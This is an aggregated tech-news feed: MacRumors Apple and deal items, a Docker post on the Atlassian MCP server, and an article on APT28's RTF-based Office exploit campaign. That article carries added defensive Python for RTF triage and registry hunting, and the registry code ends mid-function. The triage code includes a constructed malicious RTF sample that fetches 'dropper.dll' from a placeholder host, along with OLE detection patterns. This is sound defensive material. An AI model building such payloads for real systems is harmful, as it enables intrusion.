- 44 views
Amazon says that Prime subscribers can access Alexa+ with the Alexa app, Alexa-enabled devices, or the Alexa.com website. Prime members can access Alexa+ by saying "Alexa, upgrade to Alexa+," or by logging into their Amazon account on the Alexa website.
Alexa+ has been in testing since February 2025, offering a smarter, more personalized, and more proactive assistant experience. Amazon says Alexa+ is much more capable than the prior version of Alexa thanks to its updated architecture that uses large language models from Amazon Nova and Anthropic.
Alexa is able to do things like order takeout, make restaurant reservations, book rides, and schedule home repairs, plus it can control smart home products and answer questions like any other chatbot. It integrates with Amazon services, and can integrate with hardware like Ring cameras.
Amazon Prime in the U.S. is priced at $14.99 per month or $139 per year, and Alexa+ is considered one of the Prime benefits. Customers without Prime can try Alexa+ through a limited, free chat experience on Alexa.com and in the Alexa app. Subscribing solely to Alexa+ costs $19.99 per month, which makes no sense for anyone since Prime is cheaper.
Amazon's revamped Alexa+ experience is seeing a wide rollout a couple months ahead of when Apple is expected to debut a more powerful, personalized version of Siri. Siri is going to get an update in spring 2026, likely in iOS 26.4.
Alexa and Siri were two of the original large-scale voice assistants, so it will be interesting to see how Alexa+ compares to the revamped version of Siri when Siri launches.
Tag: Amazon
This article, "Amazon's Alexa+ Now Free for All U.S. Prime Members, Beating Apple's Smarter Siri to Market" first appeared on MacRumors.com
- 0 comments
- 34 views
Sid Meier's Civilization VII Apple Arcade Edition features the Civilization VII base game experience, with mouse support, controller support, and intuitive touch controls available. Players take on the role of one of many legendary leaders from history, aiming to build the greatest empire the world has ever known.
Gamers will construct cities and control armies to expand their territory, conquering or cooperating with rival civilizations for the resources to evolve and discover new technological breakthroughs. Multiplayer gameplay is not supported at launch, and DLC add-ons are not available. Large map sizes are limited to devices that have at least 8GB RAM.
Along with Civilization VII, Apple Arcade is also gaining musical rhythm adventure Felicity's Door, puzzle game I Love Hue Too+, and classic video arcade title Retrocade. Retrocade is available on the Vision Pro as well as the iPhone and iPad.
Apple Arcade is Apple's subscription gaming service, priced at $6.99 per month. The service allows up to six family members to share a single subscription, and games feature no in-app fees or ads.
Tag: Apple Arcade
This article, "Civilization VII Coming to Apple Arcade Tomorrow" first appeared on MacRumors.com
- 0 comments
- 32 views
The new series:
Imperfect Women — March 18, 2026
Margo's Got Money Troubles — April 15, 2026
Widow's Bay — April 29, 2026
Maximum Pleasure Guaranteed — May 20, 2026
Cape Fear — June 5, 2026
Lucky — July 15, 2026
The new films:
Eternity — February 13, 2026
Outcome — April 10, 2026
The Dink — July 24, 2026
Mayday — September 4, 2026
Matchbox: The Movie — October 9, 2026
Way of the Warrior Kid — November 20, 2026
We have provided a brief overview of each new show and film below.
New Series
Imperfect Women
Based on Araminta Hall's novel of the same name, "Imperfect Women" is a psychological thriller that "examines a crime that shatters the lives of a decades-long friendship of three women." The series stars Elisabeth Moss, Kerry Washington, and Kate Mara.
Margo's Got Money Troubles
"Margo's Got Money Troubles" is described as "a bold, heartwarming, and comedic family drama" that follows recent college dropout and aspiring writer, Margo (Elle Fanning), the daughter of an ex-Hooters waitress (Michelle Pfeiffer) and ex-pro wrestler (Nick Offerman). Margo has a new baby, mounting bills, and dwindling ways to pay for things.
Widow's Bay
Apple says "Widow's Bay" blends genuine horror with character-driven comedy.
Widow's Bay is "a quaint island town 40 miles off the coast of New England," but "something lurks beneath the surface." Mayor Tom Loftis (Matthew Rhys) is desperate to revive his struggling community, but as tourists start arriving, it appears that local residents might have been right about the island being cursed after all.
Maximum Pleasure Guaranteed
Billed as a darkly comedic thriller, "Maximum Pleasure Guaranteed" follows newly divorced mom Paula (Tatiana Maslany).
"Convinced she witnessed a murder — while simultaneously struggling through a custody battle and an identity crisis — Paula begins her own investigation, one that could unravel a greater conspiracy while also holding the keys to rebuilding her family and sense of self."
Cape Fear
"Inspired by the 1991 remake directed by Martin Scorsese and produced by Steven Spielberg, a storm is coming for happily married attorneys Anna (Amy Adams) and Tom Bowden (Patrick Wilson) when Max Cady (Javier Bardem), the notorious killer they are responsible for putting behind bars, is let out of prison — and he wants vengeance."
Lucky
"Written by Jonathan Tropper and Cassie Pappas and based on Marissa Stapley’s bestselling novel, 'Lucky' centers on a young woman (Anya Taylor-Joy) who left behind the life of crime she was raised in years ago, but must now embrace her darker, criminal side one final time in a desperate attempt to escape her past."
New Films
Outcome
"Outcome" is a dark comedy that centers on Reef Hawk (Keanu Reeves), a Hollywood star facing extortion. With the support of his lifelong friends Kyle (Cameron Diaz) and Xander (Matt Bomer), and his lawyer Ira (Jonah Hill), Reef tries to make amends with anyone he could have possibly wronged in hopes of identifying the blackmailer.
Eternity
"Eternity" is a rom-com: "In an afterlife where souls have one week to decide where to spend eternity, Joan (Elizabeth Olsen) is faced with the impossible choice between the man she spent her life with (Miles Teller) and her first love (Callum Turner), who died young and has waited decades for her to arrive."
The Dink
In this comedy movie, "washed up former tennis prodigy Dusty Boyd (Jake Johnson) has been reduced to coaching unruly children at his father Chuck's (Ed Harris) suburban country club. Desperate for his father's approval, Dusty blindly supports Chuck's vendetta against the new craze taking over the club: pickleball."
Mayday
Ryan Reynolds and Kenneth Branagh team up in "Mayday," a "genre-bending, action-packed buddy comedy movie that flips the spy thriller on its head."
"When hotshot U.S. Navy pilot Lieutenant Troy 'Assassin' Kelly (Reynolds) is sent on a top-secret mission into Russian territory at the height of the Cold War, the operation implodes, leaving him stranded behind enemy lines. Discovered by Nikolai Ustinov (Branagh), a gruff ex-KGB agent with a penchant for American culture, Troy thinks he's toast — but could an unlikely alliance between the two lead to Troy's rescue and a bond neither saw coming?"
Matchbox: The Movie
"Inspired by the iconic Mattel toys, 'Matchbox The Movie' is an action-packed, globetrotting adventure about a group of friends since childhood who have their lives upended when undercover CIA agent Sean (John Cena), their long-absent former leader, returns to their small town and unwittingly gets them embroiled in a frantic international pursuit to save the world."
Way of the Warrior Kid
"Middle school has been a nightmare for Marc (Jude Hill), a good kid who's bullied by his classmates and feels like he's behind in everything, from academics to P.E. to just making friends. That changes when his injured Uncle Jake (Chris Pratt), a decorated Navy SEAL, comes to spend the summer and recuperate with Marc and his mom, Sarah (Linda Cardellini)."
This article, "Apple TV Announces 12 New Shows and Films Coming This Year" first appeared on MacRumors.com
Developers can download the macOS Tahoe 26.3 update by opening up the System Settings app, selecting the General category, and then choosing Software Update. Beta Updates will need to be enabled, and a free developer account is required.
There's no word yet on what's included in macOS Tahoe 26.3, and no new features have been found during beta testing so far.
We'll likely see Apple release macOS Tahoe 26.3 next week.
This article, "macOS Tahoe 26.3 Release Candidate Now Available" first appeared on MacRumors.com
Registered developers can download the updates from the Settings app on the iPhone or iPad by going to the General section and selecting the Software Update option.
iOS 26.3 adds a tool for transitioning from an iPhone to an Android device. Transfers can be initiated during the device setup process, and moving data from one device to another can now be done without having to download a specific app.
Apple's transfer process supports moving photos, messages, notes, apps, passwords, phone number, and more.
The update also includes a Notification Forwarding setting for third-party wearables in the European Union, and there are some minor changes to the Weather wallpaper. More information on what's changed can be found in our iOS 26.3 beta feature list.
With the RC now available, Apple will likely release iOS 26.3 and iPadOS 26.3 next week.
This article, "Apple Seeds iOS 26.3 and iPadOS 26.3 Release Candidates" first appeared on MacRumors.com
The software updates are available through the Settings app on each device, and because these are developer betas, a free developer account is required.
We don't know what new features might be added in watchOS 26.3, visionOS 26.3, and tvOS 26.3, and nothing new has been discovered so far. Apple doesn't typically provide release notes for betas, so we might not know what's new until the software updates see a public launch unless there are outward-facing changes.
The software updates will likely launch next week now that RCs are available.
This article, "Apple Releases watchOS 26.3, tvOS 26.3 and visionOS 26.3 Release Candidates" first appeared on MacRumors.com
In November 2024, an anonymous listener of the Relay FM tech podcast "Upgrade" claimed that Apple was developing 90Hz display technology that could be used for the next Studio Display, as well as future iPad Air and iMac models. This higher refresh rate would make videos and scrolling look smoother to the eye, but 90Hz would stop short of the 120Hz refresh rate that iPhone, iPad, and Mac models with ProMotion support can achieve.
Now, a MacRumors tipster has backed up that claim, based on alleged information from an internal build of iOS 26 that was leaked online. Indeed, they believe the next Studio Display is likely to max out at 90Hz rather than 120Hz.
Apple's existing devices typically have 60Hz or 120Hz refresh rates, so 90Hz would be unusual for Apple. While there is no explicit confirmation, the tipster claimed that multiple code strings and display controller references in the internal iOS 26 build suggest that the next Studio Display will max out at 90Hz.
The tipster believes that a 90Hz refresh rate would make sense due to bandwidth considerations. Thunderbolt 5 can support 5K resolution at 120Hz without any compression, but they think Apple likely wants to ensure there will be plenty of remaining bandwidth for connecting other devices and peripherals to the new Studio Display.
The current Studio Display has a 60Hz refresh rate.
Apple plans to release a new version of the Studio Display "in the first half of 2026," according to the latest word from Bloomberg's Mark Gurman.
Last month, an unreleased Apple monitor with the model number A3350 surfaced in a Chinese regulatory database, and it is likely the Studio Display 2.
There have been many reports about a new Studio Display being in the works, with rumored features including mini-LED backlighting, a higher refresh rate of up to 90Hz or 120Hz, HDR support, and an A19 chip or A19 Pro chip.
This rumor still warrants some skepticism for now. In addition, the internal iOS 26 build is from early 2025, so Apple's plans may have changed since then.
This article, "Apple's Upcoming Studio Display 2 Rumored to Have an Unusual Feature" first appeared on MacRumors.com
Earlier today, Apple released version 3.7 of the Sports app, introducing support for every PGA and LPGA tournament, with live leaderboards, round-by-round scorecards for every golfer, and real-time updates in the app, widgets, and Live Activities. The app already supported the NFL, MLB, NBA, NHL, Premier League, NASCAR, F1, and more. The update also expanded the soccer lineup with support for Copa del Rey, Coppa Italia, Coupe de France, and DFB-Pokal. In addition, tennis coverage now supports real-time stats, making it easier to keep up with the action.
Backend code spotted by MacRumors reveals what's next for Apple Sports in version 3.8. Apple is planning to add support for six South American soccer leagues, including Brazil Serie A, Argentina Primera A, Colombia Primera Liga, Ecuador Serie A, Peru Primera Division, and Chile Primera Division.
The Apple Sports app launched in 2024, offering an easy way to see live scores and statistics. It is available on the iPhone in the U.S., the UK, Canada, France, Germany, Ireland, Italy, Portugal, Spain, the Netherlands, Sweden, Norway, Finland, Denmark, and other select European countries.
This article, "Six New Leagues Coming to Apple Sports" first appeared on MacRumors.com
Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.
The Prime 3-in-1 Wireless Charging Station features Qi2.2 support, which lets a compatible MagSafe iPhone charge at up to 25W. It's the same speed as Apple's MagSafe charger, and it is 10W faster than the standard Qi2 MagSafe chargers. You can also simultaneously charge an Apple Watch and AirPods with the device.
Note: You won't see the deal price until checkout.
$30 OFF: Anker Prime 3-in-1 Wireless Charging Station for $119.99
There are plenty of other Anker discounts happening on Amazon this week, including the Prime 14-in-1 Thunderbolt 5 Dock back at its all-time low price of $339.99, down from $399.99. You can find this accessory and more on sale in the lists below, and note that as of writing only the new Prime 3-in-1 Wireless Charging Station requires an on-page coupon.
$60 OFF: Anker Prime 14-in-1 Thunderbolt 5 Dock for $339.99
Wall Chargers
6-in-1 USB-C Power Strip - $79.99, down from $109.99
140W 4-Port GaN USB-C Charger - $89.99, down from $99.99
6-in-1 Prime USB-C Charging Station - $79.99, down from $109.99
14-in-1 Prime Thunderbolt 5 Dock - $339.99, down from $399.99
Wireless Chargers
Qi2 MagSafe-Compatible Wireless Charger 2-Pack - $25.98, down from $39.99
3-in-1 MagSafe-Compatible Charging Station - $89.99, down from $109.99
3-in-1 MagSafe-Compatible Charging Cube - $99.98, down from $149.95
3-in-1 Prime Wireless Charging Station (NEW) - $119.99 with on-page coupon, down from $149.99
Portable Chargers
MagGo Nano Power Bank 5,000 mAh - $45.99, down from $54.99
MagGo Power Bank 10,000 mAh - $63.99, down from $79.99
SOLIX C300 Power Station with Lantern - $169.99, down from $249.00
SOLIX C1000 Gen 2 Portable Power Station - $429.00, down from $799.00
SOLIX C2000 Gen 2 Portable Power Station - $849.00, down from $1,499.00
If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.
Deals Newsletter
Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!
This article, "Amazon Discounts Anker's Newest Prime Chargers" first appeared on MacRumors.com
The original HomePod was announced at WWDC in 2017 and launched in 2018 after a heavily delayed release. The device was met with mixed reviews; critics praised its outstanding sound quality but pointed out its high price, missing features, and limited functionality compared to rivals.
Apple dropped its price from $349 to $299 in April 2019 and, in March 2021, the company announced that it was discontinuing the first-generation HomePod, instead shifting its focus to the HomePod mini, which launched the previous year. The decision left a gap in Apple's product lineup for a full-sized smart speaker until the company introduced the second-generation model via a press release on January 18, 2023. It launched on February 3, 2023.
The second-generation HomePod looks virtually identical to the original, although it is 0.2 inches shorter and has a larger edge-to-edge LED touchscreen on top. It also brings a range of upgrades and changes over its 2018 predecessor, including the S7 chip, a U1 Ultra Wideband chip, a removable power cable, a temperature and humidity sensor, and Sound Recognition. However, it has two fewer microphones and two fewer horn-loaded tweeters than the original (four and five, versus six and seven).
Apple is widely rumored to be planning a wave of new smart home devices, including a home security camera, over the next few years, but it is not clear whether the HomePod is part of that. Around 2024, Apple appeared to be exploring a new HomePod with a touchscreen display on top, based on leaked prototype images, but there have been no further reports of such a device, or of any third-generation HomePod, for over a year.
Rumors about Apple's plans for the smart home now center on an all-new smart home hub device, which has been described as a HomePod with a square iPad-like 7-inch screen and an A18 chip, with support for the next-generation version of Siri. It is expected to launch this year. A new HomePod mini is also rumored to be released this year.
This article, "HomePod 2 Now Over 3 Years Old, With No Sign of New Model" first appeared on MacRumors.com
Here were Apple's starting prices when the devices launched in September 2024:
iPhone 16: $799
iPhone 16 Plus: $899
iPhone 16 Pro: $999
iPhone 16 Pro Max: $1,199
Apple has since lowered its starting prices for new iPhone 16 and iPhone 16 Plus models, which remain available as previous-generation options:
iPhone 16: $699
iPhone 16 Plus: $799
Finally, here are Apple's starting prices for the refurbished models:
iPhone 16: $619
iPhone 16 Plus: $699
iPhone 16 Pro: $759
iPhone 16 Pro Max: $929
The refurbished iPhone 16 lineup is also rolling out on Apple's online store in Canada, the U.K., France, Germany, Italy, Spain, the Netherlands, Belgium, Switzerland, and select other countries, but not every model is available in every country yet.
Apple's refurbished iPhones are unlocked, and they come with a new battery, a new outer shell, and a plain box with a USB-C cable. The devices are also covered by Apple's one-year limited warranty, and they are eligible for extended AppleCare+ or AppleCare One coverage. Apple says its refurbished products are thoroughly cleaned and tested, and generally they are virtually indistinguishable from brand new devices.
iPhone 16 Pro and Pro Max models feature 6.3-inch and 6.9-inch displays, respectively, up from the 6.1-inch iPhone 15 Pro and 6.7-inch iPhone 15 Pro Max. Other new features included a Camera Control button, an A18 Pro chip optimized for Apple Intelligence, a 48-megapixel Ultra Wide camera, support for 4K at 120 FPS video recording, longer battery life, faster charging over MagSafe, and improved microphones.
The lower-end iPhone 16 and iPhone 16 Plus also have a Camera Control button and support Apple Intelligence.
This article, "Apple Begins Selling Refurbished iPhone 16 and iPhone 16 Pro Models at Lower Prices" first appeared on MacRumors.com
Note: MacRumors is an affiliate partner with Samsung. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.
As for TVs, quite a few models of The Frame TV are on sale, including all-time low prices on the 2025 models. You can get the 2025 65-inch The Frame TV for $1,199.99 ($600 off), as well as the 75-inch Frame Pro for $1,999.99 ($1,200 off), matching its all-time low price.
$600 OFF: 65-inch The Frame for $1,199.99
$1,200 OFF: 75-inch The Frame Pro for $1,999.99
TVs
55-inch QLED QEF1 Smart TV - $349.99, down from $599.99
55-inch QLED Q7F Smart TV - $399.99, down from $529.99
55-inch QLED Q8F Smart TV - $599.99, down from $749.99
75-inch Vision AI Smart TV - $599.99, down from $1,199.99
50-inch The Frame - $799.99, down from $1,099.99
75-inch Neo QLED QN70F Smart TV - $999.99, down from $1,599.99
65-inch The Frame - $1,199.99, down from $1,799.99
55-inch OLED S95F Smart TV - $1,899.99, down from $2,299.99
75-inch The Frame Pro - $1,999.99, down from $3,199.99
85-inch The Frame Pro - $3,299.99, down from $4,299.99
85-inch Neo QLED QN90F Smart TV - $2,299.99, down from $4,499.99
Monitors
32-inch ViewFinity S70A UHD Monitor - $299.99, down from $459.99
43-inch Smart Monitor M7 - $359.99, down from $499.99
34-inch ViewFinity S6 Monitor - $429.99, down from $699.99
40-inch Odyssey G7 Gaming Monitor - $749.99, down from $1,199.99
49-inch Odyssey OLED G91SD Gaming Monitor - $799.99, down from $1,299.99
49-inch Odyssey G95C Gaming Monitor - $849.99, down from $1,299.99
Galaxy Products
Galaxy XR - Save up to $1,140 with the Explorer Pack
Galaxy Z Fold7 - Save up to $1,000 in instant trade-in credit
Galaxy S25 Ultra - Save up to $700 in instant trade-in credit
Galaxy Ring - Get up to $150 trade-in credit
Galaxy Watch Ultra - Save up to $250
Galaxy Watch 8 - Save up to $200
This article, "Samsung's Super Bowl Sale Has Up to $1,200 Off The Frame TV and Much More" first appeared on MacRumors.com
In this post, we’ll show you how to get started with the Atlassian remote MCP server in minutes and how to use it to automate everyday workflows for product and engineering teams.
Figure 1: Discover 300+ MCP servers, including the remote Atlassian MCP server, in the Docker MCP Catalog.
What is the Atlassian Rovo MCP Server?
Like many teams, we rely heavily on Atlassian tools, especially Jira, to plan, track, and ship product and engineering work. The Atlassian Rovo MCP server enables AI assistants and agents to interact directly with Jira and Confluence, closing the gap between where work happens and how teams want to use AI.
With the Atlassian Rovo MCP server, you can:
Create and update Jira issues and epics
Generate and edit Confluence pages
Use your preferred AI assistant or agent to automate everyday workflows
Traditionally, setting up and configuring MCP servers can be time-consuming and complex. Docker removes that friction, making it easy to get up and running securely in minutes.
Enable the Atlassian Rovo MCP Server with One Click
Docker’s MCP Catalog is a curated collection of 300+ MCP servers, including both local and remote options. It provides a reliable starting point for developers building with MCP so you don’t have to wire everything together yourself.
Prerequisites
Before you begin, make sure you have:
A machine with 8GB RAM minimum, ideally 16GB
Docker Desktop installed
To get started with the Atlassian remote MCP server:
Open Docker Desktop and click on the MCP Toolkit tab.
Navigate to the Docker MCP Catalog.
Search for the Atlassian Rovo MCP server.
Select the remote version (the one with the cloud icon).
Enable it with a single click.
That's it. No manual installs. No dependency wrangling.
Why use the Atlassian Rovo MCP server with Docker
Demo by Cecilia Liu: Set up the Atlassian Rovo MCP server with Docker with just a few clicks and use it to generate Jira epics with Claude Desktop
Seamless Authentication with Built-in OAuth
The Atlassian Rovo MCP server uses Docker's built-in OAuth support, so authorization is seamless: Docker stores the credentials and lets you reuse them across multiple MCP clients. You authenticate once, and you're good to go. Bear in mind that every client you connect then acts with the permissions of the Atlassian account you authorized, so authorize an account scoped to the projects and spaces the agents actually need.
Behind the scenes, this frictionless experience is powered by the MCP Toolkit, which handles environment setup and dependency management for you.
Works with Your Favorite AI Agent
Once the Atlassian Rovo MCP server is enabled, you can connect it to any MCP-compatible client.
For popular clients like Claude Desktop, Claude Code, Codex, or Gemini CLI, connecting takes one click: click Connect, restart the client (Claude Desktop in our demo), and you're ready to go.
From there, we can ask Claude to:
Write a short PRD about MCP Turn that PRD into Jira epics and stories Review the generated epics and confirm they’re correct And just like that, Jira is updated.
One Setup, Any MCP Client
Sometimes AI assistants have hiccups. Maybe you hit a daily usage limit in one tool. That’s not a blocker here.
Because the Atlassian Rovo MCP server is connected through the Docker MCP Toolkit, the setup is completely client-agnostic. Switching to another assistant like Gemini CLI or Cursor is as simple as clicking Connect. No need for reconfiguration or additional setup!
Now we can ask any connected AI assistant such as Gemini CLI to, for example, check all new unassigned Jira tickets. It just works.
Coming Soon: Share Atlassian-Based Workflows Across Teams
We're working on new enhancements that will make Atlassian-powered workflows even more powerful and easy to share. Soon, you'll be able to package complete workflows that combine MCP servers, clients, and configurations. Imagine a workflow that turns customer feedback into Jira tickets using the Atlassian Rovo MCP server, then share that entire setup instantly with your team or across projects. That's where we're headed.
Frequently Asked Questions (FAQ)
What is the Atlassian Rovo MCP server?
The Atlassian Rovo MCP server enables AI assistants and agents to securely interact with Jira and Confluence. It allows AI tools to create and update Jira issues and epics, generate and edit Confluence pages, and automate everyday workflows for product and engineering teams.
How do I use the Atlassian Rovo MCP server with Docker?
You can enable the Atlassian Rovo MCP server directly from Docker Desktop or CLI. Simply open the MCP Toolkit tab, search for the Atlassian MCP server, select the remote version, and enable it with one click. Connect to any MCP-compatible client. For popular tools like Claude Code, Codex, and Gemini, setup is even easier with one-click integration.
Why use Docker to run the Atlassian Rovo MCP server?
Using Docker to run the Atlassian Rovo MCP server removes the complexity of setup, authentication, and client integration. Docker provides one-click enablement through the MCP Catalog, built-in OAuth for secure credential management, and a client-agnostic MCP Toolkit that lets teams connect any AI assistant or agent without reconfiguration so you can focus on automating Jira and Confluence workflows instead of managing infrastructure.
Less Setup. Less Context Switching. More Work Shipped.
That’s how easy it is to set up and use the Atlassian Rovo MCP server with Docker. By combining the MCP Catalog and Toolkit, Docker removes the friction from connecting AI agents to the tools teams already rely on.
Learn more
Get started with the MCP Catalog and Toolkit:
Explore the Docker MCP Catalog: discover containerized, security-hardened MCP servers
Read more about the Docker MCP Toolkit: official documentation
Version 3.7 of the app introduces support for every PGA and LPGA tournament, with live leaderboards, round-by-round scorecards for every golfer, and real-time updates in the app, widgets, and Live Activities. The app already supported the NFL, MLB, NBA, NHL, Premier League, NASCAR, F1, and more.
Apple has also expanded the soccer lineup with support for Copa del Rey, Coppa Italia, Coupe de France, and DFB-Pokal. In addition, tennis coverage now supports real-time stats, making it easier to keep up with the action.
The Apple Sports app launched in 2024. It is available on the iPhone in the U.S., the UK, Canada, France, Germany, Ireland, Italy, Portugal, Spain, the Netherlands, Sweden, Norway, Finland, Denmark, and select other European countries.
This article, "Apple Sports Now Supports Golf and More" first appeared on MacRumors.com
The campaign was spotted in January 2026 by security researchers at Zscaler ThreatLabz, three days after Microsoft issued an urgent patch for the flaw.
“In this campaign, the threat actor leveraged specially crafted Microsoft RTF files to exploit CVE-2026-21509 and deliver malicious backdoors in a multi-stage infection chain,” the researchers said in a blog post. “ThreatLabz observed active in-the-wild exploitation on January 29, 2026.”
The campaign targeted users in parts of Central and Eastern Europe, including Ukraine, Slovakia, and Romania, with custom social engineering lures. The crafted rich text format (RTF) files triggered the Office vulnerability the moment they were opened, initiating a multi-stage infection chain leading to backdoors and malware implants.
Owing to significant overlap in tactics, techniques, and procedures (TTPs) between this campaign and those of APT28 (aka Fancy Bear), the threat group affiliated with Russia's General Staff Main Intelligence Directorate (GRU), Zscaler attributed the campaign to that advanced persistent threat (APT) group.
Neusploit hooked users through Office
Operation Neusploit relies heavily on CVE-2026-21509, a high-severity bug in Microsoft Office that Microsoft patched on January 26 after reports of active exploitation.
The infection begins with the victim receiving an email carrying a weaponized RTF attachment. When opened, the RTF file causes Microsoft Office to execute code that reaches out to threat actor infrastructure and downloads a dropper DLL, which then executes the rest of the malicious chain.
“The threat actor employed server-side evasion techniques, responding with the malicious DLL only when requests originated from the targeted geographic region and included the correct User-Agent HTTP header,” the researchers said.
The campaign used two different variants of the dropper DLL, deploying different components for different purposes.
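The report describes RTF files that fire on open and fetch a dropper from gated infrastructure, which makes the attachment itself the best place to stop the chain. The following is an added example, not code from the Zscaler report or from this article: a static triage routine a mail gateway or analyst can run over an RTF attachment before Word ever parses it. It flags the truncated "{\rt" header that Word tolerates but no legitimate writer emits, the OLE control words that embed an object or force it to refresh on open (\objupdate is the one that removes the need for a click), and URLs hidden in the hex-encoded object data. The article does not disclose which control words this campaign used, so the indicator list, the scoring, and both sample files are assumptions constructed here; c2.example.invalid is a placeholder host.

```python
import re
from typing import NamedTuple

# RTF control words that embed an OLE object or force it to refresh when the
# document opens. Assumption: the article does not say which of these the
# campaign used; this is the generic list used for weaponised-RTF triage.
OLE_WORDS = ("objupdate", "objdata", "objemb", "objautlink", "objclass")
OLE_RE = re.compile(rb"\\(" + b"|".join(w.encode() for w in OLE_WORDS) + rb")(?![a-z])", re.I)
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?:/[^\s\"'{}\\]*)?")
# Runs of at least 32 hex byte pairs: the usual encoding of \objdata payloads.
HEX_RUN_RE = re.compile(rb"(?:[0-9a-fA-F]{2}\s*){32,}")


class Verdict(NamedTuple):
    is_rtf: bool
    truncated_header: bool   # "{\rt..." instead of "{\rtf1": Word accepts it, real writers never emit it
    ole_words: tuple
    urls: tuple
    score: int


def _urls_in(blob: bytes) -> set:
    """ASCII URLs in blob, also after dropping NULs so UTF-16LE text is caught."""
    found = set()
    for view in (blob, blob.replace(b"\x00", b"")):
        found.update(m.group(0).decode("ascii", "replace") for m in URL_RE.finditer(view))
    return found


def triage_rtf(data: bytes) -> Verdict:
    head = data.lstrip()[:8].lower()
    is_rtf = head.startswith(b"{\\rt")
    truncated = is_rtf and not head.startswith(b"{\\rtf1")
    words = tuple(sorted({m.group(1).lower().decode() for m in OLE_RE.finditer(data)}))

    urls = _urls_in(data)
    for run in HEX_RUN_RE.finditer(data):          # decode hex-encoded object data and look inside
        hexstr = re.sub(rb"\s+", b"", run.group(0))
        if len(hexstr) % 2:
            hexstr = hexstr[:-1]
        urls |= _urls_in(bytes.fromhex(hexstr.decode("ascii")))

    score = 0
    if is_rtf:
        score += 1 if truncated else 0
        score += 2 if words else 0
        score += 3 if "objupdate" in words else 0   # object activates on open, no click required
        score += 1 if urls else 0
    return Verdict(is_rtf, truncated, words, tuple(sorted(urls)), score)


# Constructed samples (not real campaign files). The host is a stand-in.
EVIL_RTF = (b"{\\rt1\\ansi{\\object\\objautlink\\objupdate{\\*\\objclass Word.Document}"
            b"{\\*\\objdata " + b"http://c2.example.invalid/dropper.dll".hex().encode() + b"}}}")
BENIGN_RTF = b"{\\rtf1\\ansi\\deff0{\\fonttbl{\\f0 Calibri;}}Quarterly numbers attached.\\par}"

if __name__ == "__main__":
    for name, sample in (("evil", EVIL_RTF), ("benign", BENIGN_RTF)):
        print(name, triage_rtf(sample))
```

A gateway rule built on this would quarantine any RTF with a truncated header or a non-empty ole_words list regardless of score; the score is only there to rank what an analyst looks at first. The hex decoding matters because the download host in \objdata is rarely visible as plain text.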
One campaign, two infection paths
Zscaler found that exploitation of CVE-2026-21509 did not lead to a single uniform payload. Instead, the initial RTF-based exploit branched into two distinct infection paths, each serving a different operational purpose: the choice of dropper determined whether the attackers prioritized near-term intelligence collection or longer-term access to compromised systems.
In one path, the exploit delivered MiniDoor, a lightweight DLL focused on email theft. The malware modified Windows registry settings to weaken Microsoft Outlook's security controls, allowing it to quietly collect email data and exfiltrate it to attacker-controlled infrastructure. MiniDoor's design and functionality closely resemble earlier APT28 tooling, in line with the group's established espionage focus.
The second path involved a more elaborate chain that began with PixyNetLoader, which deployed additional payloads and established persistence using techniques such as DLL proxying and COM object hijacking. This loader ultimately installed a Grunt implant from Covenant, an open-source .NET command-and-control (C2) framework, giving the attackers sustained remote access through cloud-hosted C2 infrastructure.
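Both paths leave registry evidence: MiniDoor weakens Outlook's controls, and PixyNetLoader persists through COM object hijacking. The following is an added example, not code from the article or the report, that hunts for both in a .reg export of HKCU collected from a suspect host. The Outlook Object Model values it checks (ObjectModelGuard and the PromptOOM* family) are Outlook's documented programmatic-access settings; the article does not say which values MiniDoor actually changed, so treating these as the hunt list is an assumption. The COM check relies on a Windows fact: for a non-elevated process, per-user registrations under HKCU\Software\Classes\CLSID take precedence over HKLM, so an InprocServer32 pointing into a user-writable path is the hijack pattern to look for. The export text below is constructed, including the CLSIDs and paths.

```python
import re

# Outlook Object Model security values and the setting that disables each
# protection. Assumption: the article does not name the values MiniDoor changed;
# these are Outlook's documented programmatic-access controls.
WEAKENING_VALUES = {
    "ObjectModelGuard": 2,                    # 2 = never warn about programmatic access
    "PromptOOMSend": 1,                       # 1 = auto-approve sending mail via the object model
    "PromptOOMAddressBookAccess": 1,
    "PromptOOMAddressInformationAccess": 1,
    "PromptOOMSaveAs": 1,
    "PromptOOMFormulaAccess": 1,
    "PromptOOMMeetingTaskRequestResponse": 1,
}
OUTLOOK_SECURITY_KEY_RE = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\(?:Policies\\)?Microsoft\\Office\\\d+\.0\\Outlook\\Security$", re.I)
# Per-user COM registrations win over HKLM for non-elevated processes; an
# InprocServer32 in a user-writable path is the COM-hijack pattern.
CLSID_INPROC_RE = re.compile(
    r"^HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\(\{[0-9A-F-]{36}\})\\InprocServer32$", re.I)
USER_WRITABLE_RE = re.compile(
    r"^(?:C:\\Users\\|C:\\ProgramData\\|%(?:APPDATA|LOCALAPPDATA|TEMP|USERPROFILE)%)", re.I)
VALUE_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _parse_value(raw: str):
    raw = raw.strip()
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        return raw[1:-1].replace('\\\\', '\\').replace('\\"', '"')
    return raw                                # hex:, hex(2):, "-" (deletion) left as text


def parse_reg(text: str) -> dict:
    """Parse .reg export text into {key_path: {value_name: value}}; '@' is the default value.
    Real exports are UTF-16LE with a BOM: read with open(path, encoding='utf-16') first."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if current is None or not m:
            continue
        name = m.group(1)
        name = "@" if name == "@" else name[1:-1].replace('\\"', '"').replace('\\\\', '\\')
        keys[current][name] = _parse_value(m.group(2))
    return keys


def hunt(reg: dict) -> list:
    """Return (kind, where, what, value) tuples for weakened Outlook settings and COM-hijack candidates."""
    findings = []
    for key, values in reg.items():
        if OUTLOOK_SECURITY_KEY_RE.match(key):
            for name, weak in WEAKENING_VALUES.items():
                if values.get(name) == weak:
                    findings.append(("outlook_security_weakened", key, name, weak))
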